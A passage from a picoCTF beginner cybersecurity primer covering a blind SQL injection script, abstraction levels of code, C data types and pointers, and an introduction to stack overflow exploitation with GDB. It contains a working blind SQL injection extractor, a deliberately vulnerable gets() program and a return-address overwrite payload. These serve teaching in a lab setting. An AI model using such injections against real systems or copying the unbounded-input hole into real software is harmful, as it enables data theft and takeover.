id=1 ) and ''= '") if 'NOTHING FOUND...' in r.text: accum = accum[:-1] print("nope") else: print(f"We found the character: {letter}") print(accum) ``` This script is just one of the many ways in which a blind SQL injection is done. With your knowledge of Python and SQL, you should be able to understand the script if you read it carefully. Note the following: - 'Printable' is just a string with all the printable ASCII characters, and we iterate over them. - 'Binary' in mysql context, is just a way to specify the we want to make case sensitive comparisons. If we do not use it, we would not be able to identify if a character is lowercase or uppercase. - We are sending GET parameters to the web site. For this reason, we can encode them in the URL. - We put the **select '**at the end of the query to handle the closing single quote. - 'NOTHING FOUND…' Is the message printed in the html, so if that is present in the html then a wrong letter was guessed. - To clear your doubts, experiment in the SQL editor with similar queries, or do prints on the python script to make sure you understand every part of it. Depending on the SQL engine, there can be several ways to inject SQL. Even Frameworks that handle the queries for you, might have vulnerabilities in some versions, or because they are used incorrectly by developers. Keep up the good work! ## 9. Levels of Code ##### Jeffery John Throughout this Primer, we have discussed programming languages like Python, JavaScript, SQL, PHP, and C. We have tried to introduce these languages in the ways that they are used most often in cybersecurity, but each can do many of the things that the others can do. It is just as possible to run a web server in Python, as it is to write regular expressions in JavaScript. What does set these languages apart is the level of abstraction that they provide. This is a concept that is important to understand when working with code, and especially when working with reverse engineering. Abstraction in programming is about how much the author has to think about the underlying hardware. To the end user, it’s unlikely to matter or be noticed. For cybersecurity, we want to be conscious of what vulnerabilities may be hidden in these abstractions. ### 9.1. High-level Languages High-level languages are the most abstract. They are meant to be easy to read by other developers and fast to code in. They are also meant to be portable, which means they can be run on many different kinds of hardware like your desktop, phone, or server. These languages are often used to write applications or scripts, due to their ease of use. Since many programs do not need to be used by anyone other than the developer, it makes sense that developers often choose a language that is easiest for them. Some examples of high-level languages are Python, Nim, and Perl. In order for these languages to work, they need to be translated into a lower-level language. This is done by a compiler or interpreter. Here are some comparisons between high-level languages: `print("Hello World!")` `echo "Hello World!"` `print "Hello World!\n";` Each of these examples does the same thing, but the syntax is a bit different. This is because each language has its own rules and conventions. However, a computer is still able to execute the code in the same way because of the translation to a lower level like machine code. If the developer is not confident, a high-level language can also protect them from accidentally writing insecure code that may be vulnerable to attacks like buffer overflows. These can be avoided in low-level languages, but the abstraction and easier syntax of high-level languages can help prevent these mistakes. ### 9.2. Low-level Languages Low-level languages are less abstract than high-level languages. They are meant to be fast and easy for the computer to understand, not necessarily the developer. These languages are often used to write operating systems, drivers, and other software that needs to interact with the hardware. Some examples of lower level languages are C, Assembly, and Rust. We say lower level here, and not low level, because abstraction is also a relative concept. Assembly may be more direct to hardware than C, but C is lower level than Python. For comparisons between lower level languages: ``` #include <stdio.h> int main() { printf("Hello World!\n"); return 0; } ``` ``` section .data hello db 'Hello, world!',0 section .text global _start _start: mov eax, 4 mov ebx, 1 mov ecx, hello mov edx, 13 int 0x80 mov eax, 1 xor ebx, ebx int 0x80 ``` ``` fn main() { println!("Hello, world!"); } ``` Compared to the higher level languages, these are a bit more verbose for us as readers and developers. However, to the computer and hardware, not much has changed. We just see more of the details that were abstracted away by features in the higher level languages. These languages will also need to be translated into machine code for the computer to run, but they can execute faster because they can take advantage of hardware features and optimizations that interpreters may not be able to. ### 9.3. Intermediate Representation (IR) Intermediate Representation (IR) allows for interpreters and compilers to work with code in a way that is more abstract than machine code, but less abstract than high-level languages. This can lessen the gap between high and low level languages, and allow for some optimizations and other features that are otherwise not possible in high-level languages. IR is often used for applications that may be run on many different kinds of hardware, like web browsers. Rather than compiling the code several times, the IR can be optimized for multiple types of hardware, and the code will only need to be translated once to an IR. Some examples of IR are LLVM and WebAssembly. These can be useful when reverse engineering, as IR can be easier to work with and understand than raw machine code. ### 9.4. Assembly & ISA’s We have touched on assembly language before when considering C. Assembly is even less abstract than C, and consists of instructions that are directly translated to machine code. When writing in assembly, a developer has to consider the architecture of the hardware that the code will be run on, as each has its own set of instructions. This can be impractical for most applications, but is necessary for some software that needs to be as fast as possible. ISA, or Instruction Set Architecture, is the set of instructions that a particular hardware architecture can understand. This is what assembly language is written in, and is what the compiler or interpreter will translate high-level languages into. Some examples of ISA’s are x86, ARM, and MIPS. When reverse engineering these, a hacker will need to understand how the assembly code will differ between what they may be familiar with. ### 9.5. Machine Instructions Finally, machine instructions are the lowest level of code, and have no abstraction. These are the instructions that the hardware can understand, and are what the compiler or interpreter will ultimately translate the code into. These instructions are often represented in hexadecimal, and are not meant to be read by humans. It is still possible to access these instructions with tools like debuggers and hex editors, but it would be difficult to understand what is happening without a deep understanding of the hardware and the ISA. With each level of code, abstractions can take shortcuts that may be exploited by attackers. For example, a high-level language may have a feature that is meant to make it easier to work with strings, or a low-level language may have a feature that is meant to make it easier to work with memory, but these both may have vulnerabilities that can be exploited. ## 10. A little about C language ##### Samuel Sabogal Pardo We could say that C is one of the oldest programming languages that is still widely used in industry. It was developed in 1972 by the famous Dennis Ritchie, and even after all these years, is in fact one of the most used languages. This is the case because it is very efficient and we can control very directly the resources of the machine, in contrast to other languages, such as python. However, it is a more difficult language to learn to use it correctly, and it is much more prone to errors and vulnerabilities. Even experienced programmers that have written a lot of C in their lives can make a little mistake and introduce a bad vulnerability in a program that a hacker can exploit to take complete control of the machine in which the program is running. Nonetheless, many people still love C. We can use it to implement programs that need to be very efficient, such as the Operating Systems, Drivers (the programs that control the hardware of devices that we connect to our computer), or Embedded Systems. You will probably not hear about an Operating System, or a Driver, fully implemented on python, at least any time soon. ### 10.1. Some C features Keep in mind the following aspects of C: - In C you can access directly an address of memory, and move through it with a pointer even if you don’t have a variable that is stored there. - C is very prompt to vulnerabilities, as we already mentioned. We will learn to exploit those vulnerabilities. C is harder to learn and write than python, because you need to clearly understand how the memory interacts with your program. - It is not indented as python to determine the lines of code inside a function, loop, clause, etc. For example, the lines of code inside an 'if clause', are determined by braces, not four spaces. This is an 'if clause' in python and C respectively: ``` if x>5: print "Hello" ``` Now, the same in C, would look like (the 'f' at the end of print is necessary): ``` if(x>5) { printf("Hello"); } ``` But in C, we could do: ``` if(x>5) { printf("Hello"); } ``` And it would work. But it is important you do not write it like that if you begin to do programming in C, because a program can become very unreadable. Always use indentations on C, even if they are not mandatory. - In C, you do comments using '//', instead of '#' as in python. For example, the same comment in python and C, would be: ` #This is a comment in python` ` //This is a comment in C` - You can compile C for different platforms. Compiling means the process of translating the programing language to machine code. A computer does not understand directly the source code you write. A compiler is a program that reads your source code and converts it to a binary that your computer can execute. The instructions in that binary are harder to read for a human in comparison to the source code. Those instructions that the processor understands directly are called machine code. When the programs is compiled, you do not need any additional program to execute it besides the operating system. In contrast, when you run a python program, to execute it, you need the python interpreter. - Since C is so direct to the machine, people often say that it is like a portable Assembly. Assembly, as we will see later, is a language that is used to manipulate the instructions of the processor in your machine. Assembly changes depending on the kind of processor you are using. For example, Intel processors understand a different Assembly language than ARM processors. However, you could write the same program in C and it could work on both, because you can compile it either for ARM or for Intel. - In languages like python, we do not compile the program, because python has an interpreter that translates line by line when it is being executed. That makes it slower, by a fair amount. You can do an experiment by implementing a for loop that calculates something on each iteration, and compare the result between python and C, and you will note that a python loop takes much longer than a C loop that calculate the same. ### 10.2. C Hello World! Let’s get hands on now! Access the picoCTF webshell at: Create a folder called 'c_examples' using: `mkdir c_examples` Go inside the folder using: `cd c_examples` Now, create a file called "my_c_example.c" in this file, we will write the C code. You can create the file with: `nano my_c_example.c` Into that file, write the following code, which will print "Hello World!" ``` #include <stdio.h> int main() { printf("Hello World!\n"); return 0; } ``` Note that this line: `#include <stdio.h>` Is used to import a library, which is a set of functions, that allows us to read and write from the terminal in our program. This: `printf("Hello World!");` Is the function printf, which we can use to print strings in the terminal. The function main: ``` int main() { } ``` Is the function that wraps the code of our program. Note that in C, the content of function is enclosed in braces {}. By convention, main is the function that would be executed in our program, even if we don’t call it. In C, functions return a data type. In this case, main returns an 'int', which means integer. That is why we see the word 'int' right before 'main'. This line: `return 0;` Is our main function returning the integer 0. When the main function returns, that marks the end of our program. Now save the program. Remember that in the nano editor, you save the program by pressing in your keyboard 'control' and 'x' at the same time. Now, to compile our program, we will use 'gcc' which is a very famous compiler; 'gcc' means 'GNU Compiler Collection'. To compile the program, run: `gcc my_c_example.c` You will see no output on the screen if it compiled correctly. However, if you list the contents of your current folder using: `ls` You should see a new file created, called 'a.out'. The is your new executable binary! You can run it using: ` ./a.out` You should see printed the message 'Hello World!' on the screen. Note that we can execute the binary with no additional program, as we had to do with python, in which we needed the python interpreter, hence we wrote 'python' before the name of our program. What if we want to give a name to our binary when we compile it? We can do: `gcc my_c_example.c -o my_binary` If you list the contents of your folder using: `ls` You should see the file 'my_binary' listed. You can run it using: ` ./my_binary` And it will show 'Hello World!' as it did before. ### 10.3. C data types Before proceeding to do more interesting programs, let’s stop to learn the data types in C. In python, you can create a variables without specifying the data type. However, in C, you need to specify it. These are fundamental data types in C: - char: It is the data type for allocating a single character. In most of the compilers, it takes only one byte. Note that we can store any number on it, it does not have to be an actual character. Remember that a character in a computer is a number too. Since it is one byte, it can represent 256 values. As you know already, one byte is made up of 8 bits. So, 2^8 is equal to 256. - int: It is an integer type. We can place on it an integer number, but can be much bigger as the char, because an int uses four bytes. Therefore, we can place on it, roughly, four billion values (2^32). - float: This data type is used to store decimal numbers. In other words, numbers with a floating point value. They also take four bytes. But since they are decimals, is not that easy to show how many possible values stores. It is a finite number of possible values of course. But for now, just know it is used for storing numbers with decimals. Since we are on a computer, the precision is limited. A float can have at most 7 decimals! - double: It is used to store decimal numbers but with double precision, so it can have at most 15 decimals. It takes 8 bytes. In C, you could have the following code using those data types: ``` #include <stdio.h> int main() { char a='p'; int b = 12345; float c = 1.123456; double d = 1.012345678912345; printf("\n my char: %c ", a); printf("\n my int: %i ", b); printf("\n my float: %f ", c); printf("\n my double: %.16g \n\n", d); return 0; } ``` Create the file 'print_data_types.c': `nano print_data_types.c` And put the previous code on it. Compile it with: `gcc print_data_types.c -o print_data_types` And run it with: ` ./print_data_types` You should see the following output: ``` my char: p my int: 12345 my float: 1.123456 my double: 1.012345678912345 ``` We just saw how to print different data types. Things to note: - %c is used to output a character. You can have it in any position of the first string you pass as argument to printf. You can also have it in several places if you pass more characters like this: `printf("\n my char %c , my second char %c , my third char %c ",a,a,a);` - %i is used to print an integer. - %f to print a float. - %.16g is to print a float but we can specify the number of decimals we want, in this case 16, but we could change that number. An important thing to note, that we already mention, is that a character is just a number that is interpreted as such. Do the following experiment: use %i instead of %c to print the character 'p' in our program. What number do you see and why that number? Answer: You should have seen 112. That happens because 112 is the ASCII of 'p', as we can see in the ASCII table: ### 10.4. C pointers When you need to store a list of integers, you could use a buffer of memory to do it, which is just a chunk of empty memory that can be filled with the integers you need. For example, suppose we need to store a list of 5 integers and the print the whole list. We could do something like the following: ``` #include <stdio.h> int main() { int arr[5]; arr[0]=11; arr[1]=12; arr[2]=13; arr[3]=14; arr[4]=15; for(int i=0;i<5;i++) { printf("\n Array value at position %i: %i \n",i, arr[i]); } } ``` In the line 'int arr[5];' we are declaring an array of 5 integers. So the program allocated a buffer of 20 bytes, because each integer takes 4 bytes. Then we assign an arbitrary integer to each of the positions, and then we print them on a loop. In C, the first line of a for loop is made up of three parts: In the first one, you can declare a variable and set its starting value. That is 'int i=0' in our code. The second part is the condition; the loop will keep iterating as long as that condition is met. In our code the condition is 'i<5'. The third part is generally a modification you do so the loop advances. In this case we increment i by 1. Note that in C this: `i++;` Is exactly the same as this: `i=i+1;` Inside our loop, we print our counter 'i', and the current value at position in 'i' in the array. Put that code in a file using: `nano print_array.c` Compile it: `gcc print_array.c -o print_array` Run it: ` ./print_array` You should see as the output: ``` Array value at position 0: 11 Array value at position 1: 12 Array value at position 2: 13 Array value at position 3: 14 Array value at position 4: 15 ``` So far, everything seems to work fine. But now, add the following line after the for loop: `printf("\n Array value at position 7: %i \n", arr[6]);` You might be thinking that line would cause an error, because we don’t even have a seventh position in our array. However, it will not! Compile again and run the code. Remember to always compile. If you are used to python, you might forget that step. Do not forget it! The code looks like this: ``` #include <stdio.h> int main() { int arr[5]; arr[0]=11; arr[1]=12; arr[2]=13; arr[3]=14; arr[4]=15; for(int i=0;i<5;i++) { printf("\n Array value at position %i: %i \n",i, arr[i]); } printf("\n Array value at position 7: %i \n", arr[6]); } ``` And the output, should look, somewhat, like this: ``` Array value at position 0: 11 Array value at position 1: 12 Array value at position 2: 13 Array value at position 3: 14 Array value at position 4: 15 Array value at position 7: 1695902208 ``` What is going on here? We did not even have a 7th position. Our array is actually only 5 positions in size. This is something bad. What is happening, is that C does not actually have real arrays with size as other languages do. It is merely a chunk of memory. In this case, our variable 'arr' is just a pointer to the first byte of that chunk of memory. When we do, for example, arr[2], we are pointing to the first byte of the chunk of memory plus 8 bytes, because each integer has 4 bytes, so we move in memory to point to the place in which is stored the third position. You will understand this better as you advance in binary exploitation and understand how variables are placed in memory. For now, just know that C allocates the memory needed to place a buffer, but does not have any control that prevents you accessing the wrong place. In our example, 1695902208 is value from our program that is 8 bytes away from the spots in which or array should be stored, it could be other variable. Many people claim that C does not have real arrays, because as you saw, it is just a chunk of memory. In C, you can create not only variables, but also pointers to variables. A pointer simply stores the address in which a variable is located in memory. Now that you can read few lines of C, it is better to explain a program using the comments on C to explain the things that might be new to you. So, let’s take a look at the following program that illustrates pointers in an easy manner. Pay close attention to the comments. Create a file, paste that code, compile it, and run it as you already know how to. The following program might seem a bit long, but it is because it has several prints so you can understand what is happening. Is very easy to read. This is the program: ``` #include <stdio.h> int main() { //we declare a char: char c='S'; //We declare a pointer to char, for that we use the * char *p; //Assign address of the char c, to pointer p. To get the address of a variable we use & p=&c; printf ("\n This is the value of char c: %c ", c); //As we said, we use & to get the address. We are printing the memory address in which c is located: printf ("\n This is the address of char c: %d ", &c); printf ("\n This is the address that pointer p is pointing at, which is the address of c: %d ", p); //we use * to get the content in the address we are pointing at printf ("\n This is the content of the address that pointer p is pointing at, which is the value of c: %c ", *p); printf ("\n This is the address of the pointer (a pointer has to be located somewhere as well as any variable): %d ", &p); // //Now, we can use pointers to point to the first character of an array of characters, and move through it char *p2 ; //We use malloc to allocate 6 bytes p2 = malloc(6); printf ("\n This is the address that pointer p2 is pointing at %d ", p2); //Note: memory allocated with malloc, is allocated in the heap, so you see //that its value is far from the other values we have printed that were local //variables and are allocated in the stack. You will learn more about the stack and heap later. //p2 is pointing to memory in the heap, but it's a local variable, so if we print //its address it should be close to the other local variables: printf ("\n This is the address of p2: %d ", &p2); //Now we assign values to the bytes we have allocated: *(p2+0)='h'; *(p2+1)='e'; *(p2+2)='l'; *(p2+3)='l'; *(p2+4)='o'; *(p2+5)=0; printf("\n This is p2 printed as a string: %s ",p2); //Note that 0 (the ASCII for NULL), is the end of the string. //Also note that 0 is different from '0', '0' is actually 48, if you print it as an int printf("\n This is the value of the zero char, different from null char: %d ",'0'); //See what happens if we put a 0 in the middle of our char array: *(p2+2)=0; printf("\n This is the string we just created: %s ",p2); //It prints only "he" // //Of course a string can be created in a shorter way, for instance: char *p3=&"hello"; printf("\n This is the content pointed by p3: %s ", p3); // //Now, let's make a pointer to pointer to char, we will use the pointer p that points to the char c we declare previously char **pp; pp=&p; //So, imagine pp is a box (the first box), that contains an address that points to a second box, that contains an address that points to a third box, that contains a char printf("\n This is the address in which pp is allocated, the address of the first box: %d ", &pp); printf("\n This is the address pp points at, the content of the first box: %d ", pp); printf("\n This is the content of the second box: %d ", *pp); printf("\n This is the content of the third box: %c ", **pp); //we can create as many pointers to pointers as we need: char ***ppp; ppp=&pp; printf("\n This is the content of ***ppp: %c ", ***ppp); // //To explain why this could be useful, we will quote a StackOverflow post that is cool, from user pmg, https://stackoverflow.com/questions/5580761/why-use-double-pointer-or-why-use-pointers-to-pointers // //"If you want to have a list of characters (a word), you can use char *word //If you want a list of words (a sentence), you can use char **sentence //If you want a list of sentences (a monologue), you can use char ***monologue //If you want a list of monologues (a biography), you can use char ****biography //If you want a list of biographies (a bio-library), you can use char *****biolibrary //If you want a list of bio-libraries (a ??lol), you can use char ******lol //yes, I know these might not be the best data structures" pmg // //Let's see how we could implement a list of words char **pp2=malloc(100); //pp is the first address *pp2=&"hi"; *(pp2+1)=&"carnegie"; *(pp2+2)=&"mellon"; printf("\n This is hi: %s ", *pp2); printf("\n This is carnegie: %s ", *(pp2+1)); printf("\n This is mellon: %s ", *(pp2+2)); //You might be wondering about the relation between arrays and pointers. Some people say in c, the use of [] is just syntactic sugar. //But there are not actual arrays on C. //In this expression it is created a pointer to the first element of the array. In fact, arr is pointer to the first element: char arr[5]="hello"; //these expressions are the same: printf("\n This is arr[0]: %c ", arr[0]); printf("\n This is *arr: %c ", *(arr+0)); //as well as: printf("\n This is arr[1]: %c ", arr[1]); printf("\n This is *(arr+1): %c ", *(arr+1)); printf("\n This is arr[2]: %c ", arr[2]); printf("\n This is *(arr+2): %c ", *(arr+2)); printf("\n This is arr[3]: %c ", arr[3]); printf("\n This is *(arr+3): %c ", *(arr+3)); printf("\n This is arr[4]: %c ", arr[4]); printf("\n This is *(arr+4): %c ", *(arr+4)); //understanding that, you can see now why in C, a thing that looks very weird as the following, makes sense: printf("\n This is 1[arr]: %c ", 1[arr]); //As you see, it printed 'e', because that expression is just *(1+a), which is the same as *(a+1) //People says that proves that in C there are not actual arrays. What is our opinion? As long as you clearly //understand how it works in the languages you are using printf("\n SEE YOU! keep on the good work! \n "); } ``` At this point you should know the commands for creating a file, compile it, and run it, but just in case: ``` nano pointers.c gcc pointers.c -o pointers ./pointers ``` Note that the compilation shows several warnings, because we did things, for the sake of the example, that are not good practice. With this introduction to C, you will be able to begin to read the source code from challenges and clarify new things you see along the way on Google. Now it is approaching the real fun of binary exploitation! ## 11. Binary Exploitation ##### Samuel Sabogal Pardo Get ready for binary exploitation. We use C to explain binary exploitation because it is a language very prone to have vulnerabilities, however, other languages have similar vulnerabilities. ### 11.1. A hack example! A hack is not necessarily a cyberattack. It is just a clever way to do something, in our context, on a computer. For example, how would you make a program to print the smallest of two numbers without using an if statement? This sounds complicated when you first hear it, but look at the following bit hack! Make a small program in C copying this code: ``` #include <stdio.h> int main(int argc, char **argv) { int x=9; int y=5; int result=y^((x^y)&-(x<y)); printf("this is the smallest number %d \n", result); return 0; } ``` That was fantastic! What is happening here? Keep in mind the results of the following operations: ``` AND 1 & 0 = 0 0 & 0 = 0 1 & 1 = 1 0 & 1 = 0 ``` ``` XOR 1 ^ 0 = 1 0 ^ 0 = 0 1 ^ 1 = 0 0 ^ 1 = 1 ``` Now, we have y=5, x=9.Let’s analyze each part of: y ^ ( ( x ^ y ) & - ( x < y ) ) In the part highlighted in bold: y ^ ( ( x ^ y ) & - **( x < y )** ) x < y is false, in c false is represented as a 0, that in a byte would look like this: 00000000 -0, is 0, so it keeps being 00000000 So, -**( x < y )** is 0. So far we would have y ^ ( ( x ^ y ) & **0** ) Now y ^ ( **(x^y)** & 0 ) **( x ^ y )** & 0 is 0 , because any value & 0, is still 0 So we get to y ^ ( **0** ) This is simply y ^ 0 , when you take any value and do XOR with zero, it is like doing nothing! So we get to **y** which is the smallest number (cool!!!!!!) But what happens if the values of x and y are swapped, surely it will not still print the smallest number? Swap the values in your code, compile and run it again to see what happens! That was amazing. That is a beautiful hack! It is actually called a bithack! In a computer, this operation executes much faster than an "if" statement. In most of the programs you don’t need to execute an operation that fast to comply with the functionality you need, but in some cases that is needed. Let’s say that a hack could be simply a clever thing. Now, what is an exploit? It is an attack on a computer program. If a computer program has a vulnerability, a hacker can take advantage of such a vulnerability to make the program do something different from the original purpose of the program. Taking advantage of a vulnerability successfully, it is called an exploit. ### 11.2. Stack overflow attack By this point you should already know how to use the terminal, compile programs and have some understanding of C programming. Create the following program in the webshell, and name it vuln1.c: ``` #include <stdio.h> #define BUFSIZE 4 void win() { puts("If I am printed, I was hacked! because the program never called me!"); } void vuln() { puts("Input a string and it will be printed back!"); char buf[BUFSIZE]; gets(buf); puts(buf); fflush(stdout); } int main(int argc, char **argv) { vuln(); return 0; } ``` You can see that the function win() is never called in the program. Therefore, the message that it prints should never be printed. right? Compile the program using: gcc vuln1.c -o vuln1 -fno-stack-protector -no-pie Now run the program using: ./vuln1 You can input a string, and it will print it back. For instance, if you input "HelloPicoCTF", it should show: Input a string and it will be printed back! ``` HelloPicoCTF HelloPicoCTF ``` The program did what it was written for. Now, we are going to send a particular string to the program using python. You can run a single line of python in the command using the flag -c, and enclosing the line of code between single quotes. In the terminal you can pass the output of one command as the input to other command using the pipe, which is this character "|". In the following command we are printing something in python, and passing that to the C program we just compiled. `python3 -c 'print("hello world!")' |./vuln1` You should see "hello world!" printed back to the terminal right after the command. Note that in python you can repeat the same character if you multiply it by a number, so 128*"A" is simply a string composed by 128 "A" repeated. For example if you run: `python3 -c 'print(10*"A")'` You should see the output: `AAAAAAAAAA` Now we are going to send a string that is composed by 128 characters repeated, concatenated to some bytes. `python3 -c 'print(128*"A"+"\x20\xe0\xff\xff\xff\x7f\x00\x00\xb7\x05\x40\x00")' |./vuln1` As result you will see: ``` If I am printed, I was hacked! because the program never called me! Segmentation fault (core dumped) ``` What just happened? We simply sent a string, and a function that is never called in the program was called… We can send some particular input to the program to break it and make it do something that we want. That "particular input" you send to a program in the security jargon is called the "**payload**". You just hacked a very simple binary. But… what happened on the inside? Why? A very rough explanation, is that when you call a function, the computer needs to know how to come back to continue executing the code that called it after the function finishes its execution. The address of the piece of code that you should continue on after the function call (you do not see this in the source code), is called the return address. Since the program is not checking the boundaries of the input in the C program we made, you can overwrite the place in which the return address is stored! Let’s understand that better so you can manipulate similar exploits at your will. ### 11.3. What you need to know for a binary exploit The famous Stack Overflow is a type of Buffer Overflow, an anomaly that overwrites a memory sector where it should not. It causes security problems by opening doors for malicious actions to be executed. To understand it, it is necessary to have an idea of how the memory of a computer works. #### 11.3.1. Memory RAM means "random access memory". It is called Random Access because you can access any part of it directly, without having to pass first for other regions, as it was necessary at some point in history. For example, computers used to have a magnetic tape in which an item of data could only be accessed by starting from the beginning of the tape and finding an address sequentially. In a RAM we can go to any part of it immediately! Conceptually, a RAM is a grid with slots that can contain data. Let’s imagine we have a RAM of only 5 slots. We could name each slot by a number, starting at 0, so it would look like this: Now, if we want to put the word "HELLO" in our imaginary memory, we could put each character of "HELLO" in each slot, like this: The numbers we used to identify each slot of the memory are called addresses. If we ask: what character is in the address 1? The answer would be the character ‘E’. A real memory from a computer nowadays can have billions of addresses. Normally, addresses are shown in hexadecimal. For example, the address "255" would normally be shown as "0xFF". In a program, the memory is used in a certain way to be able to do all that the program can do, and the program itself is present in memory when it is being executed. The memory is organized in the following sections: When we compile a C source code, this is converted to machine code also known as binary. When a program is run, this machine code is placed in the code section. The code section holds only machine code, not the source code we know from C for example. The machine code is a set of instructions that the processor of a computer can understand. The computer will execute the instructions sequentially and while doing that will access other parts of memory to read data and output results. A program has several sections, but for now, let’s keep in mind the following three sections: - Data section - Heap - Stack In the data section, static and global variables are placed. This variables always exist when the program is being run, in contrast to local variables that disappear when a function finishes and returns the result. In the heap is placed the memory allocated dynamically. For example, when you use malloc in C to allocate a buffer, that buffer is allocated on the heap. It is called dynamic allocation because the program allocates memory when is already running and executing the particular instruction for malloc. In the code you write you can also decide to deallocate a buffer of memory that you previously allocated. So, it is called dynamic because the programmer can allocate it and deallocate a chunk of memory of a desired size. In the Stack segment, are placed the local variables, function parameters and return addresses. What is a return address? When we call a function, the address of the next instruction has to be stored somewhere so the program knows where to comeback after the function is finished. We call this address the "return address". A function can be called in different parts of a program, so this return address will be different depending on where the program calls the function. ### 11.4. Example of Execution of a program The execution of a program and its memory is controlled by processor registers, usually called simply registers. These are a very small and fast kind of memory that is attached to the processor. A register can store 4 or 8 bytes, depending on the processor. A processor only has a few registers. Depending on the kind of processor, the registers might differ. But we will take a look at the ones that are generic to most processors and will let us understand later the most common binary exploits. To see a real example in action we can use GDB, a software that allows us to see the execution of each part of a programs and its memory step by step. This kind of software is called a debugger. When a binary program is running and we debug it, we can see in detail what the program is doing in memory by analyzing the **Assembly**. What is the Assembly? It is a low level language that can be used to show what each instruction from the machine code does. GDB can generate assembly from the machine code in memory while we are debugging the program so we can easily see what the machine code is doing. #### 11.4.1. GDB, Assembly and machine code In the webshell, GDB is already installed, so you can run `gdb ./vuln1` You should see something like this: ``` GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git Copyright (C) 2018 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from vuln1...(no debugging symbols found)...done. (gdb) ``` Now, input "run" and press enter. Remember to press enter after using a command. The program "vuln1" will be executed, so you can enter any string and it will print it back, as it normally does the program "vuln1". You should see something like this if the string you input is "HelloPicoCTF": ``` (gdb) run Starting program: /vuln1 Input a string and it will be printed back! HelloPicoCTF HelloPicoCTF [Inferior 1 (process 95000) exited normally] (gdb) ``` If you input "r" instead of "run", it will do the same because "r" is the GDB abbreviation for "run". If you do the experiment you should see the same: ``` (gdb) r Starting program: /vuln1 Input a string and it will be printed back! HelloPicoCTF HelloPicoCTF [Inferior 1 (process 95000) exited normally] (gdb) ``` To exit from GDB, you can input "quit" and press enter. Also, you could input only "q" and it will quit too. In several GDB commands, you can also input the first character of the command, and GDB will understand. Now, open GDB again to debug "vuln1" with the same command we used previously: `gdb ./vuln1` But now, before running it using "run", we want to stop at the beginning of the function "vuln()". To do this, you can set a breakpoint at vuln(). Setting a breakpoint, simply means that the execution of the program will pause in the instruction you set the breakpoint. By running "break vuln" or "b vuln", a breakpoint will be set at the beginning of vuln. We will see this: ``` (gdb) b vuln Breakpoint 1 at 0x4005ce ``` The addresses you see might be different, that is ok. | What does it mean "Breakpoint 1 at 0x4005ce" ? Do you remember that there is a segment of the memory in which the machine code is placed? In the memory address "0x4005ce" the machine code of "vuln()" begins. Input "r" to start the execution of the program and you will see: ``` (gdb) r Starting program: /home/samuel/Desktop/problems/vuln1 Breakpoint 1, 0x00000000004005ce in vuln () (gdb) ``` "Breakpoint 1, 0x00000000004005ce in vuln ()" means that the first break point we have set, was established at address "0x00000000004005ce", which is the same address as "0x4005ce"; An address is a number in this case, so zeros at the left cause no effect. Note that in other cases, zeros at the left can have an effect if what we are reading is not being interpreted as a number. ##### Processor registers A program is made up of several instructions that are executed sequentially. The processor of the computer has an integrated and very small memory different from RAM, called the "registers". A processor only has a few registers. Each register can hold only 8 bytes in a 64 bit processor, and 4 bytes in a 32 bit processor. A 32 bit program can run on a 64 bit processor, but 64 bit program cannot run on a 32 bit processor. One of the registers is called the Instruction Pointer, abbreviated as IP, that keeps track of the part of the program that is currently being executed. In a 64 bit program, we can print the value of this register in GDB using "x $rip": ``` (gdb) x $rip 0x4005ce <vuln+4>: 0x80c48348 (gdb) ``` Note that the first part of the line shown is "0x4005ce", this is exactly where the breakpoint was placed, so the IP naturally has that value because we made the program pause there. Then we have "<vuln+4>", do you remember we said that by setting a breakpoint at a function it would pause at the beginning of the function? To be more precise, a breakpoint on a function is usually placed 4 bytes after the beginning of the machine code of what is considered the function. That’s why the "+4". Later we will understand why it’s done like this. The remaining part, "0x80c48348", is the actual content at the address "0x4005ce". That content is a part of the machine code of the "vuln()" function. To show the whole machine code of the function, showing each instruction on each address and its machine code, we can run "disas /r": ``` (gdb) disas /r Dump of assembler code for function vuln: 0x4005ca <+0>: 55 push %rbp 0x4005cb <+1>: 48 89 e5 mov %rsp,%rbp => 0x4005ce <+4>: 48 83 c4 80 add $0xffffffffffffff80,%rsp 0x4005d2 <+8>: 48 8d 3d 27 01 00 00 lea 0x127(%rip),%rdi 0x4005d9 <+15>: e8 c2 fe ff ff callq 0x4004a0 <puts@plt> 0x4005de <+20>: 48 8d 45 80 lea -0x80(%rbp),%rax 0x4005e2 <+24>: 48 89 c7 mov %rax,%rdi 0x4005e5 <+27>: b8 00 00 00 00 mov $0x0,%eax 0x4005ea <+32>: e8 c1 fe ff ff callq 0x4004b0 <gets@plt> 0x4005ef <+37>: 48 8d 45 80 lea -0x80(%rbp),%rax 0x4005f3 <+41>: 48 89 c7 mov %rax,%rdi 0x4005f6 <+44>: e8 a5 fe ff ff callq 0x4004a0 <puts@plt> 0x4005fb <+49>: 48 8b 05 3e 0a 20 00 mov 0x200a3e(%rip),%rax 0x400602 <+56>: 48 89 c7 mov %rax,%rdi 0x400605 <+59>: e8 b6 fe ff ff callq 0x4004c0 <fflush@plt> 0x40060a <+64>: 90 nop 0x40060b <+65>: c9 leaveq 0x40060c <+66>: c3 retq End of assembler dump. (gdb) ``` Each line of what was just printed by GDB is organized in three parts. Let’s analyze the following line to introduced machine code and assembly: 0x400602 <+56>: 48 89 c7 mov %rax,%rdi The left part is the address "0x400602 <+56>". After the address some spaces are shown, then in the middle we find the machine code, that in this case is "48 89 c7". After some other spaces, we find the Assembly, which is "mov %rax,%rdi". Assembly is a low level language that can be directly mapped to the machine code. That’s why GDB can see some machine code in the memory and print for us the assembly that represents. A specific sequence of bytes in the machine code maps to an instruction of assembly. So, when a program is running and in memory is seen the sequence of bytes "48 89 c7" in the code segment, the computer knows that is some specific instruction and the processor has to do a specific action. Right now the intention is not to explain assembly in detail, but just for the sake of this example, know that "mov %rax,%rdi" moves the value of the register "rax" into the register "rdi". While the program is being executed by going forward in the code section of memory where the machine code is located, and it appears the sequence of bytes "48 89 c7", the processor knows that it has to copy the register "rax" into "rdi". Note that in the function, there are two parts in which appears the machine code "48 89 c7" and both have the same assembly. Now, in this line: 